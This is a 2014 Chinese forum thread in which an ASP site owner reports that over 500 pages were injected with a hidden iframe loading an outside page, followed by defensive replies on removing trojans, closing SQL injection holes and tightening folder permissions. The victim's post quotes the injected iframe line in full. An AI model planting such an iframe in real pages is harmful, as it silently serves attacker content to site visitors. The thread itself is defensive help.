日期:2014-05-17  浏览次数:20907 次

网站被黑了,请问怎样补救!(急!)
有500多个页面在一分钟内,代码最后面全部加了 <iframe   src=http://www.66ki.cn/kai.htm   width=100   height=0> </iframe>
我现在只是把本机的代码重新上传到服务器,请问现在应该做些什么可以防止他再黑我呢?(我的代码是asp写的!)

------解决方案--------------------
1.你要暂时关闭你的站点。
2.上网搜索一个软件,叫ASP木马检测,可以查出被篡改的文件,清除恶意代码。
3.90%你的代码编写存在sql injection注入漏洞,检查一下代码。
4.解决方法:
(1)可以使用网上通用的防注入系统添加到你的站点(推荐,但还是不保证有能力的攻击者再次注入)
(2)也可以用inplace语句替换 ', ",;等字符到 conn.asp页面中。(麻烦,但很有效果)

------解决方案--------------------
多看看sql注入的技术文章,用阿D注入工具测试程序能否注入

网站是否有上传的功能,有的话将在IIS里设置上传目录属性,将其执行权限改为无,即使黑客上传了木马,他也运行不了程序。

在注册表将木马运行的组件改名,关于这些组件的详细介绍
http://www.enet.com.cn/article/2007/0116/A20070116397776.shtml

如果是自已单独的服务器,看下这篇文章
http://faq.csdn.net/read/216862.html



------解决方案--------------------
另外设置好文件夹的权限,只给读取和列出文件夹目录权限,不要给写入,这样他上传了也不能修改你的程序。
------解决方案--------------------
别给他注入的机会,相关权限要设置好,封掉不用的端口
------解决方案--------------------
把站上的马找到,利用那个马批量把自己站上被注的信息删除,然后将马删除.
接着需要检查一下站被注的原因,是参数没过滤还是上传,数据库备份功能没处理好
然后把需要写权限的打开,不需要写权限的就只给读取就可以了.
最后检查下,服务器上就你一个站还是多个站,会不会殃及池鱼!